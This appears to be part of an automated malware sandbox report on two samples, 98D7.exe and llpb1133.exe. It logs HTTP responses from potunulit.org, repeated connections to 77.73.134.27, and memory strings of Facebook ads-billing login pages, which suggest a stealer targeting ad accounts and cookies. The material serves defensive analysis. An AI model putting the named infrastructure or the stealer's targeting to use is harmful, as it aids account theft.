6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aWGUvC9p7B9ge2VmPEDbD1T2gZA3FnRQeyST42aQmwHMVbkvBU%2BinrYVfPZcF6Ot3cWgx2RtufcPO824ddUMUCbODlWkOHKN%2FXp34UqxUUVD6GPOPfpQOj%2BE6VQ6Zb8q"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47da7d86368c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 64 37 39 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 60 55 61 3a 79 ca 77 53 d5 9a 8c 9f 09 09 50 5c 31 86 f0 7d e1 37 bd 55 01 2f 79 de 2e f9 56 9c 30 f4 95 ea fe d1 32 eb 55 e0 a0 93 a8 fb 34 51 f7 ec dd d0 60 a8 58 87 cb 1b 8b 72 05 70 be ec f0 c0 a2 09 33 38 28 fa 85 0d a0 f4 03 9b 7c 7f bf 6c 13 d9 e8 ec 3d e5 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 56 2b 78 39 84 19 7e 45 f7 ff 78 8d 55 db 24 0d 11 12 b4 1f e8 92 24 82 4e c5 03 9f df a1 61 7e de f5 96 ce 19 17 7e 4f af 9a a5 e4 c8 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f5 96 be 25 51 61 9f d4 3e 7c 88 28 c8 48 6b 51 d5 4a 9a 07 fd ec 1d 4d 78 ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 e5 22 cd 4f 6b 79 82 ae 9c 37 17 4c 9d 48 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df 35 f9 e7 46 24 4c 80 90 00 f9 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 52 30 ff 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 9b 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 db 06 b6 1b 6f d3 cb 29 32 a2 e6 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 eb 10 0c e4 a6 dd 11 9f 10 81 d8 b0 99 89 98 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fa b0 92 48 a9 b4 bb e9 64 17 28 d2 0e 53 1f d0 81 aa 7a 8f 30 69 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a d6 63 b9 82 7b 50 bf e5 7e df 81 70 d4 03 2b b9 98 76 46 0f ca 82 29 27 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 01 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 Data Ascii: 7d79`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*`Ua:ywSP\1}7U/y.V02U4Q`Xrp38(|l=3Ob>!Z:V?#BSSQV+x9~ExU$$Na~~OzN.%Qa>|(H
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nm%2B9wXOwJygUApSyo%2FsXU83kSZdAgyRAu2MkrRUoT5YQvFgA6JudWXpw4PtikPgdsZtJvoIAL%2B85C87kuvaeZZSnFfJsEkee%2BuWQ1B%2FqGnSA6JS6apLWz0%2FQnEBwX5OL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47dd29ff368c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: unknown TCP traffic detected without corresponding DNS query: 77.73.134.27
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000504000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1 equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: </span><a href="/r.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;locale=en_US&amp;display=page" rel="nofollow" class="_97w5">Sign up for Facebook</a></div></div><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value="" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type" /><input type="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="false" /><input type="hidden" autocomplete="off" id="had_password_prefilled" name="had_password_prefilled" value="false" /><input type="hidden" autocomplete="off" name="ab_test_data" value="" /></form><script nonce="tcnyEH4i">window.ge||(window.ge=function(a){return document.getElementById(a)});window.onload=function(a){return function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a=new RegExp(a+"=(.*?)(;|$)");return a.test(document.cookie)?RegExp.$1:null}b("c_user")&&!window.__cancelCookieReload&&(window.clearInterval(window.__cookieReload),window.location=a)}function begin_polling_login_cookies(a){window.__cookieReload=window.setInterval(function(){reload_on_new_cookie(a)},5e3),window.__cancelCookieReload=!1,window.addEventListener("beforeunload",function(){window.__cancelCookieReload=!0})}</script></div></div></div></div><div class=""><div class="_95ke _8opy"><div id="pageFooter" data-referrer="page_footer" data-testid="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_US&quot;, &quot;https:\/\/de-de.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 0); return false;" title="German">Deutsch</a></li><li><a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 1);
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: cIwww.facebook.comHTEP equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.484805156.0000000000502000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingrk\Cookiescheme1 equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.461533941.000000000052C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingue122samesite22l equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "AXiYmP4qFaQHascr1k0","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-xX0","isCQuick":false});</script><script nonce="tcnyEH4i">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tcnyEH4i"></style><script nonce="tcnyEH4i">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="styleshee equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485706369.00000000004EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #63WjvmBvstar-mini.c10r.facebook.comwww.facebook.comVcf/+Vt226/Tfv/c0/6XlGQvncBnYIhZfQm7+OMVLOakv6bGNmsWm2WlX8BGIe1tmTItZUHmNoSUEtBlYjjKKdiBcDympESTiMp3g/vFmdLt2Njlufiy+G2fSvJpt5NtRx419dPslV5CO3cc6Nz/HIt1+3SfmbHjBZdK1ytmm0dCckPvQQ3RK3JRwz9Grl4i4AG/I2xT6le5aTRTfIVX2uKzcq7Y+hdMb9qgjqO5bWZHetnvjbdtz6L3329ZuUN/SwvQW90i7rMOKaYwuwGE8ZdbN5RiygzlV2R/yBpBV2ZaltVCvuWptI4zU0EcpICK8IPhHCK0oRCeHVRVMySpMI/5wR4Z9FDKtM1o20/Qcb2C6P8HRVa4H5XjttjTfaeYyoe1One41Vq0fPYwTdk/qCVl45y29Bt+zYR2oO1ozPfvzRxORNbG9HJpT1c8i6h20n6mWGv0aGfeFhcznTXyFTYPS5ZwRexxBVXHIdQxSjuI4hUhW5jqGbrmSkLikIV2Z0RI7tc/vHvvjQOzGy58t4L6+ZOEQW9Cm9pVW0loYbQQwPqFVXLMO6uClkv7cutymKP0fyjaI/WXyjGCBGvlEMlksGyAUHU3zffa/dpHxlI9uDAsv6OMaAh4LOaNaSNVHHf25r620e+2lSXiafwvrHque0FWushDuverG8CK1iS3bVhro66+ZTlAhdSlddpOpPeav+IpXLwcbC9YhgY+HpNNhYtJ5klJ7T7tURostEQAdd1/d3Ld+0G+/R7kxdNCa7aZSvl83RbvaDHuwY/Eqb8WncHJ6uF9tlvCtqvl0dN2tgqOcxSrrUza7vKoH8na50vdKVn3QX1dtdYiigbRDJ67RBtEJPG3TVmOym0XMnDV66p3y+h181ixVb0MUNhU7XagZcT8sXDPt62kAZ3/W0toQSLhHnetpgSc/1tIFM7vW0wSq819OG6kiG6hBxfF3LKWdfU33PF6B6H+xh1xbHZ8baFQO/WJ1Gi8JqiXa6yNUk6Eba0KzIjbShXOJG2nAl5EbaSC3JcC2iFzqvzoX9/pIetr2ozevOB+PjxSOdyL3hUf/VzEhY3NwyWFCe+ulTto/zk6SiUdHde5tmtAXYZu1xKyeYBcX7w8Sf6n4HjXcNhsonQ+S5K8GIUx9/ewGmxE9DtzljWG2t6mxwJ+rjVqMxbYhbHg/Kk+HOCF7k7EyD0EPCObt2rnBRuXOFconOFa6EdK5ILclwLd6Y2vY688PvvmGT8lAP6yedzCo1+QXoM3jKfnGDcdBbX7uUiLyI+RDOJsyHCDXEfIjWk4zQI6/No25I9nf8KwzMP+5hB2c0o2o29UpRL7dhB7mCm/UFcae2PUhFBJyLq8G0twb3KLu9OZPsJm91twf1uUhOVNbfRdlJ9y4vqMqu2pLR2uRwx51Ionwv/e0E21IsQ/mrs3X32pqLq7kbvDW3VfFnMZl178aGLudNRaH+AKEhdyuCHSxI equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com' equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com85fCl5 equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comBPxf9szi equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comF5Ljz7 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comP equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com\ equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comtey.com equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccount_billing&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_h4Swrc8tiWJ sx_8ed39e"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">Watch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT33nT0av14-OdCHPSBrmN7vWoi_N58qoOyFxP9hxRxhkYZWAsqrYtRQKSZkjXicDAN0rsfh_ncZ6C7b0pQeIWPfdIA5WlCAuouNjLvOMIXOLTMLxJamyk7gEFY1PtSDmz1xbLox7hwsOPFgyN5QVw" title="Check out Instagram" target="_blank" rel="nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Check out Bulletin Newsletter">Bulletin</a></li><li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn how we collect, use and share information to support Facebook.">Privacy Policy</a></li><li><a href="/privacy/center/?entry_point=facebook_page_footer" title="Learn how to manage and control your privacy on Facebook.">Privacy Center</a></li><li><a href="/groups/explore/" title="Explore our Groups.">Groups</a></li><li><a href="https://about.meta.com/" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Advertise on Facebook.">Create Ad</a></li><li><a
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ,[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/login.php",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7197487241275804713"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","g5ziY9wIl3trqyKMAcJWVuY9",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","g5ziY8MhThgrxFTRnRYf0yiq",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1871697":{r:1,s:1},"1829319":{r:1},"1829320":{r:1},"1843988":{r:1}}},hblp:{consistency:{rev:1006922962},compMap:{TransportSelectingClientSingleton:{r:["Jg4hod5","3zhsDmU","Yv2Rq7N"],rds:{m:["ContextualConfig","BladeRunnerClient","DGWRequestStreamClient","MqttLongPollingRunner","BanzaiScuba_DEPRECATED"],r:["c6kpRKc","9Zir1u8","sqCOqNp","HN4gUih","foz7nw7","msMcd10","TjYa5zM","5p9Jgd9","Ajrp3n3","CUpDMe1"]},be:1},RequestStreamCommonRequestStreamCommonTypes:{r:["Jg4hod5"],be:1}}}},allResources:["c6kpRKc","sqCOqNp","GpQFBwL","TjYa5zM","foz7nw7","CUpDMe1","msMcd10","BnbajS7","HN4gUih","Da6rL6k"]});}));</script></body></html> equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: .Rwww.facebook.com/ads/manager/account_settings/account_billingE51FFCD991E7 equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.00000000028BA000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.482623800.0000000000558000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604870150.000000000289F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing0`J equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingemRHRnNiQ0k2SUNJd0lpd2dJbTFoWXlJNklDSTVNemRtT0RVMU1EbjA9K equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 801],[30005,838801],[30006,573585],[30007,838801],[30008,838801],[30012,838801],[30013,838801],[30015,806033],[30018,806033],[30021,540823],[30022,540817],[30040,806033],[30093,806033],[30094,806033],[30095,806033],[30101,541591],[30102,541591],[30103,541591],[30104,541591],[30106,806039],[30107,806039],[38000,541427],[38001,806643]]}",fds:60,fda:60,i:60,sbs:1,dbs:100,bbs:100,hbi:60,rt:262144,hbcbc:2,hbvbc:0,hbbi:30,sid:-1,hbv:"8512997887222069599"}]],["NavigationMetrics","setPage",[],[{page:"XWebLoginController",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7197487022966541601"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","UJziYyYI8MDeJZgXiXCkQ3-E",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","UJziYxwlxqEat5iGTuvcAVAe",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1743095":{r:1,s:1},"1871697":{r:1,s:1},"1829319":{r:1},"1829320":{r:1},"1843988":{r:1}},gkxData:{"1652843":{result:false,hash:"AT6uh9NWRY4QEQoYoPI"}}},hblp:{consistency:{rev:1006922962},rsrcMap:{zPYlTyl:{type:"js",src:" equals www.facebook.com (Facebook)
